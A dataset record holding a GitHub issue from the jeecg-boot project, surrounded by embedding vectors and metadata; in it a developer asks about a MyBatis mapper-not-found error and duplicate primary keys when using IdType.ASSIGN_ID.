0.008326075039803982, -0.009663423523306847, -0.03008315898478031, 0.004098326899111271, -0.016307028010487556, -0.021656423807144165, -0.01576058380305767, 0.015314800664782524, -0.0066436040215194225, 0.016824711114168167, 0.008628057315945625, 0.002746598096564412, -0.00762145034968853, 0.02543838694691658, 0.026905156672000885, 0.036439161747694016, -0.008800618350505829, -0.02008899301290512, -0.0141356335952878, 0.007139717228710651, -0.0001330158847849816, -0.0018280695658177137, -0.010051686316728592, -0.001590798026882112, 0.002570441924035549, 0.0051193139515817165, 0.0005931789055466652, 0.0037424196489155293, -0.006909635383635759, 0.01591876521706581, 0.0040444014593958855, -0.0009535800199955702, 0.026962677016854286, 0.005899433977901936, 0.004123492166399956, 0.04063814878463745, 0.015731824561953545, -0.0007252960349433124, 0.004515349864959717, 0.000011409987564547919, 0.00323192635551095, 0.004098326899111271, 0.030658362433314323, -0.0057520377449691296, 0.018809163942933083, 0.009785654954612255, -0.008843758143484592, 0.012050519697368145, 0.0026513300836086273, -0.017888838425278664, -0.004497374873608351, -0.012582583352923393, -0.0016114694299176335, 0.018665364012122154, -0.012970845215022564, -0.002904779277741909, 0.035403791815042496, -0.0006794594810344279, 0.025984831154346466, 0.008498636074364185, -0.011928288266062737, 0.0028346762992441654, 0.00001369900655845413, -0.015990665182471275, -0.009303921833634377, 0.010461519472301006, -0.004648365546017885, -0.015516122803092003, 0.007035461254417896, -0.008584916591644287, 0.0007086690748110414, 0.00001044101645675255, -0.006499802693724632, -0.004763406235724688, 0.00617984589189291, -0.013136216439306736, 0.0014443007530644536, 0.0022253196220844984, -0.0032858517952263355, -0.011813247576355934, -0.010260197333991528, 0.011698206886649132, 0.0128989452496171, -0.001826271996833384, -0.022878730669617653, 0.005094148684293032, -0.019341228529810905, -0.021915264427661896, 0.007333848625421524, -0.030514560639858246, -0.021340060979127884, -0.020621055737137794, 0.007880291901528835, -0.0046627456322312355, 0.031147286295890808, -0.010569369420409203, 0.009656233713030815, -0.019441887736320496, 0.024287980049848557, -0.003600416239351034, 0.02070733718574047, 0.018205199390649796, 0.015559262596070766, -0.006575298495590687, -0.018622223287820816, 0.019384367391467094, 0.00755673972889781, -0.01235969178378582, 0.00671909935772419, -0.020160892978310585, -0.009613092988729477, 0.005317040253430605, 0.007980952970683575, 0.003911385778337717, 0.018507182598114014, 0.017989499494433403, 0.008484255522489548, -0.02286435104906559, -0.012014569714665413, 0.003240913851186633, -0.014049353078007698, -0.0006983333732932806, -0.00980722438544035, 0.04291020333766937, -0.009555572643876076, -0.005313444882631302, -0.005849103443324566, -0.004411093890666962, -0.004522539675235748, -0.01935560815036297, 0.015055959112942219, -0.012057709507644176, 0.011813247576355934, -0.009102599695324898, 0.0008421342936344445, 0.008505825884640217, 0.022001545876264572, 0.02599921077489853, -0.004123492166399956, -0.014998438768088818, -0.009634663350880146, 0.0012205105740576982, -0.02477690391242504, 0.0006763138226233423, 0.006941990926861763, 0.015372321009635925, 0.007197237573564053, -0.004490184597671032, 0.001524290069937706, -0.020175272598862648, -0.008822187781333923, 0.008865328505635262, 0.0013804890913888812, 0.0004808344237972051, 0.01725611463189125, 0.007592690177261829, -0.014372904784977436, 0.010641270317137241, -0.016105705872178078, -0.003541098441928625, 0.0002646836219355464, 0.025582188740372658, 0.021900884807109833, -0.003192381002008915, 0.01869412325322628, 0.02791176363825798, 0.0065609184093773365, -0.031032245606184006, 0.008505825884640217, 0.0014281232142820954, -0.007164882495999336, -0.013409438543021679, 0.008707147091627121, -0.025093264877796173, 0.028875229880213737, 0.01161192636936903, 0.002904779277741909, 0.017026033252477646, -0.0009490862721577287, 0.020980559289455414, 0.0233245138078928, 0.0037460147868841887, -0.038538653403520584, 0.002396083204075694, -0.011345895007252693, 0.011597546748816967, -0.00944772269576788, -0.005065388511866331, 0.011087053455412388, -0.0023924882989376783, 0.005953359417617321, 0.015055959112942219, 0.019801391288638115, -0.021512622013688087, -0.005514766555279493, 0.015990665182471275, 0.01622074656188488, -0.029392914846539497, 0.019902050495147705, -0.002890398958697915, -0.010619699954986572, -0.011317134834825993, 0.014581415802240372, -0.00005459942258312367, 0.018564702942967415, -0.013258447870612144, -0.002094101393595338, 0.0033020293340086937, 0.011238044127821922, 0.002732218010351062, -0.00869995728135109, -0.0064962077885866165, -0.017126692458987236, 0.007039056625217199, 0.013481338508427143, -0.005266709718853235, -0.004705885890871286, -0.01233093161135912, -0.026444993913173676, -0.009411771781742573, -0.013164976611733437, 0.015055959112942219, -0.01576058380305767, -0.00708219688385725, -0.010411188937723637, -0.016206366941332817, 0.006690339185297489, -0.030830923467874527, 0.0011845603585243225, 0.01791759766638279, 0.000987732782959938, -0.027005817741155624, -0.0221453458070755, -0.004220557864755392, 0.004385929089039564, -0.002050961134955287, -0.0018208795227110386, 0.023008150979876518, 0.011266804300248623, -0.017443055287003517, -0.013610759750008583, -0.0012753346236422658, 0.00041679805144667625, 0.0028095110319554806, 0.01459579635411501, -0.014811498112976551, -0.00222711730748415, 0.01873726397752762, 0.0002001978864427656, -0.009958215989172459, -0.004601630382239819, 0.0032552939373999834, -0.009462102316319942, -0.009469292126595974, 0.01330877747386694, -0.011913908645510674, -0.018938584253191948, 0.01745743490755558, 0.016307028010487556, 0.004569275304675102, 0.014912158250808716, -0.014214723370969296, -0.006977940909564495, -0.01527166087180376, -0.01879478432238102, -0.00023951845651026815, 0.01527166087180376, -0.006151085719466209, -0.010181107558310032, -0.021181879565119743, -0.007779631298035383, 0.0006632818840444088, -0.015401081182062626, 0.0004464570083655417, 0.015530502423644066, -0.01055498979985714, 0.006136705633252859, -0.015990665182471275, 0.022619890049099922, -0.020721716806292534, -0.0020006306003779173, -0.017443055287003517, -0.003728039562702179, -0.026531275361776352, -0.007463269401341677, 0.005302660167217255, -0.0007315873517654836, 0.00025726889725774527, 0.00826855469495058, 0.015544882975518703, -0.015286040492355824, 0.016565868631005287, 0.002061746083199978, -0.0035249206703156233, 0.025308966636657715, -0.005525551270693541, -0.025424007326364517, -0.011381844989955425, 0.017529334872961044, 0.047598112374544144, 0.03238397464156151, 0.005719682667404413, 0.008354835212230682, -0.001885589910671115, 0.0022666624281555414, 0.002246889751404524, -0.028199365362524986, 0.004885637201368809, -0.015027198940515518, 0.0024841614067554474, 0.0007522586965933442, -0.004170227330178022, 0.026085492223501205, 0.006258936133235693, 0.00996540579944849, 0.0019826556090265512, 0.014207533560693264, -0.02172832377254963, 0.006039639934897423, 0.0011180524015799165, -0.008577726781368256, -0.013373488560318947, 0.003230128902941942, 0.0059785242192447186, -0.008793427608907223, 0.04716671258211136, -0.006118730176240206, 0.008628057315945625, 0.009656233713030815, 0.00026176267419941723, 0.0008848251891322434, 0.01859346218407154, 0.01397745218127966, 0.01739991456270218, -0.017888838425278664, -0.012381262145936489, -0.006366787012666464, 0.01951378956437111, 0.016925372183322906, -0.004238532856106758, -0.014150013215839863, 0.0014775547897443175, -0.009088220074772835, -0.01058374997228384, 0.012237460352480412, 0.01276952400803566, -0.018305860459804535, 0.01693975180387497, 0.005374560598284006, 0.007923432625830173, 0.006862900219857693, 0.022691790014505386, -0.016263887286186218, 0.01600504480302334, -0.04236375913023949, 0.009383011609315872, 0.0035896312911063433, 0.000230306206503883, -0.00037073681596666574, 0.03347685933113098, 0.009972595609724522, -0.007686160504817963, 0.023367654532194138, 0.010928872041404247, -0.010001355782151222, 0.03160744905471802, 0.0033218020107597113, -0.019269326701760292, 0.009900695644319057, -0.0039653112180531025, 0.01586124487221241, -0.007736491039395332, -0.01243878249078989, 0.00693839555606246, 0.007916241884231567, 0.005090553779155016, -0.008836568333208561, -0.014042162336409092, 0.018622223287820816, 0.009339871816337109, 0.007952192798256874, 0.013826461508870125, -0.012460351921617985, -0.015602403320372105, -0.0019556928891688585, -0.006036045029759407, -0.012431591749191284, 0.0064350925385952, -0.004788571503013372, -0.021857744082808495, -0.0023906908463686705, 0.00012649990094359964, 0.011324324645102024, -0.004306838382035494, 0.018406521528959274, 0.0054716262966394424, -0.01508471928536892, -0.0058814589865505695, 0.015544882975518703, -0.0065141827799379826, 0.0015602402854710817, 0.01797511801123619, -0.012064899317920208, 0.0020545560400933027, -0.0022900300100445747, -0.005644187331199646, -0.01478273794054985, -0.00009448171476833522, -0.0023062077816575766, 0.007434509228914976, -0.00028692782507278025, -0.0054896012879908085, 0.002379905665293336, 0.011439365334808826, -0.012266220524907112, -0.002284637652337551, 0.01107267290353775, 0.016364548355340958, -0.0295654758810997, -0.011647877283394337, -0.010655649937689304, 0.007456079125404358, 0.016795950010418892, 0.009620283730328083, 0.027739202603697777, 0.005130098666995764, -0.009699374437332153, -0.019815770909190178, -0.015544882975518703, 0.004378738813102245, 0.013395057991147041, 0.0024571986868977547, -0.023094432428479195, -0.009943835437297821, -0.015329181216657162, -0.003460210282355547, 0.027638541534543037, -0.023568974807858467, 0.008714337833225727, 0.010130777023732662, -0.009821604937314987, 0.003586036153137684, -0.005805963184684515, 0.00674785953015089, 0.007391368970274925, -0.0033901073038578033, -0.017141073942184448, -0.009282351471483707, 0.002881411463022232, -0.006535753142088652, -0.01957130990922451, 0.0063308365643024445, 0.020419735461473465, 0.011842007748782635, -0.009383011609315872, -0.011604736559092999, 0.00378555990755558, 0.005755633115768433, 0.0000494315754622221, -0.010439949110150337, 0.02362649515271187, -0.004767001606523991, 0.007578310091048479, -0.011015152558684349, 0.016954131424427032, 0.010792260989546776, 0.054874442517757416, -0.00929673109203577, -0.013035556301474571, -0.020764857530593872, -0.00831888522952795, -0.010713170282542706, 0.017745036631822586, -0.020117752254009247, -0.005892243701964617, 0.009332682006061077, -0.0060252598486840725, 0.0166377704590559, 0.025050126016139984, 0.004896422382444143, 0.011655067093670368, -0.0007509106071665883, 0.01724173314869404, -0.0035662634763866663, -0.018866684287786484, 0.016177605837583542, 0.012345311231911182, -0.002234307350590825, 0.023151952773332596, 0.0024356285575777292, 0.004393118899315596, 0.0007783226319588721, 0.0012663471279665828, 0.005403320770710707, -0.002234307350590825, -0.0016393307596445084, 0.0014973273500800133, -0.02415855973958969, -0.0006156478193588555, 0.016652150079607964, 0.002052758587524295, 0.005514766555279493, -0.0005653174594044685, -0.004648365546017885, 0.009562763385474682, 0.013797701336443424, 0.009253591299057007, -0.030859682708978653, -0.007980952970683575, 0.03134860843420029, -0.0027268254198133945, -0.015602403320372105, 0.01879478432238102, 0.008707147091627121, 0.00350155308842659, -0.004612415563315153, -0.003900600830093026, 0.008922848850488663, -0.001952097867615521, -0.01601942628622055, -0.0036147963255643845, 0.0000489821977680549, -0.01777379773557186, 0.03270033746957779, -0.009620283730328083, -0.010871351696550846, -0.015846865251660347, 0.007128932047635317, 0.021081218495965004 ]
null
null
null
null
null
null
null
null
null
[ "jeecgboot", "jeecg-boot" ]
各位大佬请教一个问题通过自动代码生成的基础代码之后我写了一个简单的查询但是一直报错 org.apache.ibatis.binding.BindingException:Invalid bound statement (not found) 找不到Mapper.xml的文件 ![YA}FPPR(GM}C`@NBZI R_BU](https://github.com/jeecgboot/jeecg-boot/assets/45219794/417906f6-bf08-460a-8b7e-d2a5a7e4aaa3) ![ATF CVBJ(OLU J8`T3MAB2T](https://github.com/jeecgboot/jeecg-boot/assets/45219794/4d79610b-4485-4062-a061-1f5108856429) 然后我把xml文件挪到了resources下顺利找到了Mapper.xml的文件,但是在新增的时候会偶尔报错Duplicate entry '' for key 'PRIMARY'主键重复 ![9G)6O%O@S%(HS VM$5I@{V3](https://github.com/jeecgboot/jeecg-boot/assets/45219794/afe31f76-0ddb-4bb0-8a49-da7255d04fe2) 然后我把实体类的Id改为ASSIGN_UUID之后就会正常新增不会重复请问有哪位大佬能解答一下这个问题 ![Z~(JS3X9ZR5LX{`ES}ESYWS](https://github.com/jeecgboot/jeecg-boot/assets/45219794/f70e2316-1a50-42bb-8be0-f26e39cfe9ca) ![M$ L_29M79%J8Z3T(H85NRX](https://github.com/jeecgboot/jeecg-boot/assets/45219794/ccbb6cb2-4c24-4149-b0a7-1e21433f3ed9) ![image](https://github.com/jeecgboot/jeecg-boot/assets/45219794/0f497446-2331-4d46-ba0c-71bb4ddc31fe) 在启动类我手动加上了 @MapperScan({"org.jeecg.**.mapper.**"})因为之前没加会找不到Mapper文件 请问这个ASSIGN_ID(3)主键重复是因为我把Mapper.xml挪到了resources的原因吗
自建Cloud模块找不到Mapper解决完之后,主键IdType.ASSIGN_ID新增会重复
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/6230/comments
1
2024-05-17T08:42:52
2024-07-12T05:41:51Z
https://github.com/jeecgboot/JeecgBoot/issues/6230
2,302,150,883
6,230
false
This is a GitHub Issue repo:jeecg-boot owner:jeecgboot Title : 自建Cloud模块找不到Mapper解决完之后,主键IdType.ASSIGN_ID新增会重复 Issue date: --- start body --- 各位大佬请教一个问题通过自动代码生成的基础代码之后我写了一个简单的查询但是一直报错 org.apache.ibatis.binding.BindingException:Invalid bound statement (not found) 找不到Mapper.xml的文件 ![YA}FPPR(GM}C`@NBZI R_BU](https://github.com/jeecgboot/jeecg-boot/assets/45219794/417906f6-bf08-460a-8b7e-d2a5a7e4aaa3) ![ATF CVBJ(OLU J8`T3MAB2T](https://github.com/jeecgboot/jeecg-boot/assets/45219794/4d79610b-4485-4062-a061-1f5108856429) 然后我把xml文件挪到了resources下顺利找到了Mapper.xml的文件,但是在新增的时候会偶尔报错Duplicate entry '' for key 'PRIMARY'主键重复 ![9G)6O%O@S%(HS VM$5I@{V3](https://github.com/jeecgboot/jeecg-boot/assets/45219794/afe31f76-0ddb-4bb0-8a49-da7255d04fe2) 然后我把实体类的Id改为ASSIGN_UUID之后就会正常新增不会重复请问有哪位大佬能解答一下这个问题 ![Z~(JS3X9ZR5LX{`ES}ESYWS](https://github.com/jeecgboot/jeecg-boot/assets/45219794/f70e2316-1a50-42bb-8be0-f26e39cfe9ca) ![M$ L_29M79%J8Z3T(H85NRX](https://github.com/jeecgboot/jeecg-boot/assets/45219794/ccbb6cb2-4c24-4149-b0a7-1e21433f3ed9) ![image](https://github.com/jeecgboot/jeecg-boot/assets/45219794/0f497446-2331-4d46-ba0c-71bb4ddc31fe) 在启动类我手动加上了 @MapperScan({"org.jeecg.**.mapper.**"})因为之前没加会找不到Mapper文件 请问这个ASSIGN_ID(3)主键重复是因为我把Mapper.xml挪到了resources的原因吗 --- end body ---
1,305
[ 0.011982058174908161, 0.0008715225267224014, -0.0012234353926032782, 0.01103694923222065, 0.023835966363549232, 0.000683301710523665, 0.022234085947275162, 0.03620247542858124, 0.00955521035939455, 0.040399398654699326, 0.03267833963036537, 0.021593334153294563, 0.038381028920412064, 0.007412696722894907, 0.01717214658856392, 0.050427164882421494, -0.02431652881205082, 0.046070050448179245, -0.04917769879102707, -0.016315141692757607, 0.0013575927587226033, -0.007945321500301361, 0.008922467939555645, 0.04129645228385925, 0.021577315405011177, 0.04305851832032204, 0.008377829566597939, 0.0036262543871998787, -0.04030328616499901, -0.0391499325633049, -0.02236223593354225, 0.0024849153123795986, 0.0515805184841156, 0.015946708619594574, 0.013631993904709816, 0.01545813586562872, -0.011076996102929115, -0.0022566476836800575, -0.032838527113199234, -0.018966251984238625, 0.02152925916016102, -0.01520183589309454, -0.022506406530737877, 0.03703545033931732, 0.003600223921239376, 0.003946630284190178, -0.0345044806599617, -0.01513775996863842, -0.05154848098754883, 0.03269435837864876, -0.007088316138833761, -0.01604282297194004, -0.03189341723918915, -0.04763989523053169, 0.021160826086997986, 0.00136660342104733, 0.03645877540111542, -0.005502455867826939, -0.05603374168276787, -0.004184910096228123, 0.014665205962955952, 0.002526964759454131, -0.005802808329463005, 0.031396836042404175, -0.0022906875237822533, 0.030980348587036133, -0.042770180851221085, 0.049273811280727386, -0.013287589885294437, 0.011349315755069256, 0.03956642001867294, -0.001073259161785245, 0.05760358273983002, 0.02452477440237999, 0.01936672255396843, -0.018213368952274323, 0.043539080768823624, 0.01856578141450882, 0.026527123525738716, 0.00964331440627575, -0.017909010872244835, 0.006791968829929829, -0.04296240583062172, -0.015297948382794857, 0.04068773612380028, 0.004297041334211826, -0.05055531486868858, -0.07759504020214081, -0.007592908572405577, 0.007172415032982826, -0.025181544944643974, -0.03181332349777222, -0.000996168702840805, -0.03208564594388008, 0.03581802174448967, 0.01543410774320364, -0.01704399660229683, 0.008321763947606087, -0.04623023793101311, 0.0009215812315233052, -0.007484781555831432, 0.0003967154480051249, -0.007132368162274361, -0.01838957518339157, 0.041456639766693115, 0.011821869760751724, 0.011749785393476486, 0.004453224595636129, 0.02220204845070839, 0.07573685795068741, 0.006319414358586073, 0.013143420219421387, -0.05737932026386261, -0.02777658961713314, 0.0014306785305961967, -0.01653139479458332, -0.00414486275985837, -0.039982911199331284, -0.008385838940739632, -0.04023921117186546, -0.05673857033252716, 0.003682320239022374, -0.05126013979315758, -0.031605079770088196, -0.05052327737212181, -0.002220605267211795, -0.005089971702545881, 0.042642030864953995, 0.007673002313822508, -0.02870567888021469, 0.02109675109386444, -0.045269113034009933, -0.02604655921459198, 0.001032211002893746, 0.006743912119418383, 0.005029901396483183, 0.029955144971609116, 0.02811298333108425, -0.011805851012468338, -0.041841089725494385, -0.04389149695634842, -0.052285343408584595, -0.0059549869038164616, -0.01215826440602541, -0.05488038808107376, 0.0036703061778098345, 0.032870564609766006, 0.03328705579042435, -0.0033078810665756464, -0.008978534489870071, -0.020455999299883842, -0.01750854216516018, 0.03319093957543373, 0.07733874022960663, -0.0017280273605138063, 0.01334365550428629, 0.003850517561659217, 0.02245834842324257, 0.020023493096232414, 0.0085380170494318, 0.011261212639510632, -0.02380392886698246, 0.04318666830658913, -0.017220202833414078, -0.0067839594557881355, -0.013039298355579376, 0.0017991107888519764, 0.022682612761855125, -0.050170861184597015, 0.014865441247820854, -0.006087141577154398, -0.009731417521834373, 0.05196496844291687, -0.0018912188243120909, -0.034312255680561066, -0.016515376046299934, 0.034696709364652634, 0.010660507716238499, -0.03424818068742752, 0.01304730772972107, 0.00982753001153469, -0.004297041334211826, 0.03517727181315422, 0.03243805840611458, 0.04494873434305191, -0.04770397022366524, 0.017412429675459862, -0.03568987175822258, 0.012206320650875568, 0.012542715296149254, -0.017732804641127586, -0.0005456401850096881, 0.06096753105521202, -0.017860954627394676, 0.0021625373046845198, -0.008682186715304852, -0.0400790236890316, -0.0376441664993763, -0.0026931597385555506, -0.014080519787967205, -0.004365121480077505, -0.01076462958008051, -0.021337034180760384, 0.038156766444444656, 0.0391499325633049, 0.03203758969902992, 0.03069200925529003, -0.009515163488686085, -0.010364159941673279, -0.005546507425606251, -0.05949380248785019, 0.03488893434405327, 0.03162109851837158, -0.007640964817255735, 0.018037162721157074, 0.027840664610266685, 0.014929516240954399, 0.022186029702425003, -0.0010392193216830492, -0.009931651875376701, 0.01882208324968815, -0.009338957257568836, 0.020407943055033684, 0.02841734141111374, 0.0008985542226582766, -0.0019212540937587619, -0.007504804991185665, 0.015570268034934998, 0.003966653719544411, 0.011501493863761425, 0.0690089613199234, 0.002154527697712183, -0.024540793150663376, -0.014601130969822407, -0.016435282304883003, -0.016611488536000252, -0.015442117117345333, 0.010860742069780827, -0.01699594035744667, -0.002126494888216257, 0.017989106476306915, 0.028096964582800865, -0.04667876660823822, 0.013143420219421387, 0.018469668924808502, 0.01779687963426113, 0.02756834402680397, 0.017909010872244835, -0.012799016200006008, -0.002039392711594701, 0.032325927168130875, -0.000164693221449852, 0.0060551040805876255, -0.008369820192456245, 0.008497970178723335, -0.003570188768208027, 0.0009781476110219955, 0.03315890207886696, 0.006852039135992527, -0.005198098719120026, 0.0029094135388731956, 0.002601051703095436, -0.0870140865445137, -0.002368779154494405, 0.011397371999919415, -0.04049551114439964, -0.004649455193430185, 0.03559375926852226, -0.0004124839324504137, 0.054944463074207306, 0.049658261239528656, -0.05596966668963432, -0.028481416404247284, 0.027536306530237198, -0.0006572711281478405, -0.02325928956270218, 0.024813111871480942, 0.025165526196360588, 0.02723195031285286, -0.009379004128277302, 0.00786522775888443, 0.020359886810183525, 0.0003098635352216661, -0.010484300553798676, -0.04254591837525368, -0.005610582418739796, 0.0051059904508292675, -0.026254802942276, -0.015257901512086391, 0.013551900163292885, -0.010203971527516842, -0.053727034479379654, -0.036683037877082825, 0.023403458297252655, 0.008053448982536793, -0.005454399157315493, -0.0012554730055853724, -0.005914939567446709, 0.010268046520650387, -0.0038725435733795166, -0.0005846860003657639, -0.01458511222153902, 0.01691584661602974, -0.011517512612044811, -0.0180051252245903, 0.007616936694830656, -0.00028608564753085375, -0.023900041356682777, -0.031476929783821106, -0.01645130105316639, 0.009627295657992363, 0.030179407447576523, -0.0055304886773228645, -0.02537376992404461, -0.018966251984238625, 0.034055955708026886, 0.025774240493774414, -0.0027792607434093952, -0.04863305762410164, -0.01275095995515585, -0.021192865446209908, 0.017780860885977745, -0.04731951653957367, -0.0031156553886830807, 0.04373130947351456, -0.014769327826797962, -0.047511741518974304, 0.055873554199934006, -0.010972874239087105, 0.009819520637392998, 0.008978534489870071, -0.026735367253422737, 0.006391498725861311, 0.018341518938541412, -0.03703545033931732, -0.01581054925918579, 0.0100197559222579, 0.02439662255346775, -0.007809162139892578, -0.017748823389410973, -0.02736010029911995, 0.026318877935409546, -0.024428660050034523, 0.02109675109386444, 0.03128470480442047, 0.016755659133195877, 0.03975864499807358, 0.003223782405257225, 0.01549818366765976, -0.013135410845279694, 0.0010602439288049936, -0.005478427745401859, 0.007745087146759033, 0.005810817703604698, -0.01965506002306938, -0.018533743917942047, -0.009755445644259453, 0.0007558868383057415, 0.017236221581697464, 0.02245834842324257, -0.03130072355270386, -0.045301150530576706, -0.00023202222655527294, 0.013712087646126747, 0.01653139479458332, 0.014368858188390732, 0.0048857321962714195, -0.01570642739534378, -0.05616189166903496, -0.0029074111953377724, 0.014705252833664417, 0.02723195031285286, -0.016291113570332527, 0.02325928956270218, -0.032069627195596695, 0.0015648358967155218, -0.00031762264552526176, -0.0031617095228284597, 0.025822296738624573, 0.033767618238925934, 0.04763989523053169, -0.012126226909458637, -0.008906449191272259, -0.008465932682156563, 0.011493484489619732, 0.017524560913443565, 0.008986543864011765, -0.008682186715304852, -0.024284491315484047, -0.04985048621892929, -0.017989106476306915, 0.019639041274785995, -0.03831695392727852, -0.02710380032658577, -0.015450126491487026, 0.0007588903536088765, -0.020792394876480103, -0.0010302086593583226, 0.024236435070633888, -0.02503737434744835, 0.017220202833414078, 0.019590985029935837, -0.002927434630692005, 0.00164092518389225, 0.0029835004825145006, -0.020984619855880737, 0.011717747896909714, 0.018213368952274323, 0.034184105694293976, 0.009411041624844074, -0.036554887890815735, -0.03709952533245087, -0.011109033599495888, 0.027408156543970108, 0.003762414213269949, 0.0012835058150812984, 0.008053448982536793, 0.017316317185759544, -0.04004698619246483, 0.01154154073446989, 0.0017460485687479377, -0.013495833612978458, 0.005550512112677097, -0.0025449858512729406, -0.02393207885324955, 0.004469243343919516, 0.03559375926852226, 0.03886159509420395, 0.020920544862747192, 0.021256940439343452, -0.019302647560834885, 0.010187952779233456, 0.04731951653957367, 0.024765055626630783, -0.00760091794654727, -0.03306278958916664, -0.014833403751254082, -0.01944681629538536, -0.028401322662830353, -0.0015488171484321356, 0.0103401318192482, 0.04828064516186714, 0.010516338050365448, -0.008337782695889473, -0.0271838940680027, 0.0024128309451043606, -0.055745404213666916, -0.03331909328699112, -0.006351451855152845, -0.0142887644469738, 0.007805157452821732, 0.018165312707424164, -0.020199699327349663, -0.049401961266994476, -0.027920758351683617, -0.028000852093100548, -0.007977358996868134, 0.02452477440237999, 0.0447244718670845, 0.003518127603456378, 0.006876067258417606, 0.013007260859012604, -0.00030610914109274745, -0.013656022027134895, 0.01283105369657278, -0.003305878723040223, 0.02748825028538704, 0.0077210585586726665, 0.003043570788577199, -0.023243270814418793, 0.033895768225193024, 0.001533799571916461, 0.029698844999074936, 0.011149080470204353, -0.0500747486948967, 0.010179943405091763, -0.007032250519841909, -0.019943399354815483, -0.02888188511133194, 0.016211019828915596, -0.011421400122344494, 0.008970525115728378, -0.012815034948289394, 0.007905274629592896, -0.02388402260839939, -0.016130926087498665, 0.034856896847486496, 0.013648012652993202, -0.022426310926675797, 0.032245833426713943, 0.01699594035744667, -0.02080841362476349, -0.005234140902757645, 0.0042690085247159, 0.0018762012477964163, -0.052029043436050415, -0.0117337666451931, 0.0234675332903862, 0.020407943055033684, 0.008554035797715187, -0.013527872040867805, -0.024348566308617592, -0.00985155813395977, 0.027199912816286087, 0.015057666227221489, 0.014785346575081348, -0.010284066200256348, 0.03263028338551521, 0.0007128363358788192, -0.03184536099433899, -0.010708563961088657, -0.018021143972873688, 0.0220738984644413, -0.020455999299883842, 0.0003191244031768292, -0.006463583558797836, 0.03205360844731331, -0.0007558868383057415, 0.035914137959480286, 0.008938486687839031, -0.024300510063767433, -0.0023968119639903307, -0.0132155055180192, 0.023179195821285248, 0.04853694513440132, -0.007652978878468275, 0.04219350218772888, 0.021112769842147827, 0.014809374697506428, -0.021577315405011177, -0.01763669215142727, 0.007048269268125296, 0.028913922607898712, 0.011477465741336346, -0.026078596711158752, 0.01944681629538536, 0.029843013733625412, 0.010668517090380192, -0.009106684476137161, -0.02901003509759903, 0.028177058324217796, 0.0391499325633049, -0.008241669274866581, 0.01766872964799404, 0.006511639803647995, -0.00010093091987073421, -0.004881727509200573, -0.01725224032998085, 0.024700980633497238, 0.015386051498353481, 0.03597821295261383, -0.019414778798818588, 0.012494659051299095, -0.003770423587411642, -0.000012311319551372435, -0.004821657203137875, -0.02199380472302437, 0.033255018293857574, -0.0034720737021416426, 0.015089703723788261, -0.03056385926902294, 0.028609566390514374, 0.007620941381901503, -0.008818346075713634, 0.0206802636384964, 0.011990067549049854, -0.04632635414600372, 0.020792394876480103, -0.012046133168041706, -0.022186029702425003, 0.017396410927176476, 0.012118217535316944, 0.003768421243876219, -0.010980883613228798, 0.021881673485040665, -0.005734728183597326, 0.01585860550403595, 0.009186778217554092, 0.001967308111488819, 0.021833615377545357, 0.013656022027134895, -0.007640964817255735, -0.005666648503392935, 0.008618110790848732, -0.0034700713586062193, 0.014008435420691967, -0.028305208310484886, -0.026527123525738716, 0.007216466590762138, 0.015249892137944698, -0.010372169315814972, -0.005025896709412336, -0.0051260138861835, -0.021288977935910225, 0.053983334451913834, -0.004945802502334118, -0.020311830565333366, 0.015362023375928402, -0.01717214658856392, -0.02993912622332573, -0.002771251369267702, 0.014368858188390732, 0.024236435070633888, -0.045557450503110886, -0.003652285085991025, 0.021577315405011177, 0.015866614878177643, -0.034055955708026886, 0.0032618269324302673, 0.006475597620010376, 0.03527338430285454, 0.011109033599495888, 0.05882101133465767, -0.017828917130827904, 0.01530595775693655, 0.025646088644862175, 0.04305851832032204, 0.019222551956772804, 0.002066424349322915, 0.012478640303015709, 0.020327849313616753, -0.02909013070166111, 0.03466467186808586, 0.012879110872745514, 0.0019983446691185236, 0.034728746861219406, -0.013648012652993202, -0.007829185575246811, -0.004196924157440662, 0.00008747763058636338, -0.022714650258421898, 0.002362772123888135, -0.01838957518339157, -0.043410930782556534, 0.0036342639941722155, 0.008409867063164711, 0.001544812461361289, 0.0026330891996622086, -0.006679837126284838, -0.026735367253422737, 0.0051540471613407135, 0.025726182386279106, 0.0060911462642252445, 0.0017720790347084403, -0.02604655921459198, -0.0025289671029895544, -0.004086794797331095, 0.0053382632322609425, 0.02084045112133026, -0.007216466590762138, -0.0211448073387146, -0.020520074293017387, 0.00001215488555317279, 0.019190514460206032, 0.00039070838829502463, -0.037996578961610794, -0.011717747896909714, 0.03102840483188629, 0.0257902592420578, 0.009146731346845627, -0.042097389698028564, -0.025389788672327995, 0.03844510391354561, -0.015874624252319336, 0.023147158324718475, 0.03250213339924812, -0.002889389870688319, 0.012334471568465233, 0.0180051252245903, -0.000011114602784800809, -0.01230243407189846, -0.004857699386775494, -0.013984407298266888, 0.012758969329297543, -0.015794530510902405, -0.02960273064672947, -0.014801365323364735, -0.025149507448077202, -0.004557346925139427, -0.0077691152691841125, -0.012959204614162445, -0.0004642947460524738, 0.024668943136930466, -0.0032117681112140417, -0.005946977064013481, 0.0024568825028836727, 0.002058414975181222, -0.0264310110360384, 0.014408905059099197, -0.0073085748590528965, -0.02261853776872158, 0.005350277293473482, 0.011405381374061108, 0.026671292260289192, 0.013808200135827065, 0.00193727295845747, 0.0009496141574345529, -0.00800939742475748, -0.013415739871561527, 0.010428234934806824, -0.02156129665672779, -0.017396410927176476, -0.002927434630692005, -0.007709044497460127, 0.0007313580717891455, 0.015642352402210236, 0.004341093357652426, -0.009803501889109612, 0.022041860967874527, 0.01093282736837864, 0.010692545212805271, -0.021240921691060066, 0.0015928688226267695, -0.03383169323205948, -0.010428234934806824, -0.024620886892080307, -0.02824113331735134, -0.02080841362476349, -0.03700341284275055, 0.013535881415009499, -0.05420760065317154, 0.008029420860111713, 0.014216680079698563, -0.040143098682165146, -0.0018611836712807417, -0.009066637605428696, 0.013399721123278141, -0.003974663093686104, 0.006235315464437008, 0.007596913259476423, -0.026110634207725525, 0.0027792607434093952, 0.003067599143832922, 0.020504055544734, -0.005450394470244646, 0.010211980901658535, 0.04011106118559837, -0.013567918911576271, -0.025598032400012016, -0.005626601632684469, 0.009547200985252857, 0.004457229282706976, -0.0074086920358240604, -0.009370994754135609, -0.00013077844050712883, -0.008313754573464394, -0.020488036796450615, 0.0142887644469738, -0.017684748396277428, 0.03517727181315422, 0.02245834842324257, 0.014136585406959057, 0.005810817703604698, 0.005942972376942635, -0.03572190925478935, 0.00929891038686037, 0.02663925476372242, -0.012927167117595673, -0.001056239241734147, 0.0024789082817733288, 0.04731951653957367, -0.002310710959136486, -0.01962302252650261, 0.01983126625418663, 0.011653672903776169, 0.009515163488686085, 0.023035025224089622, 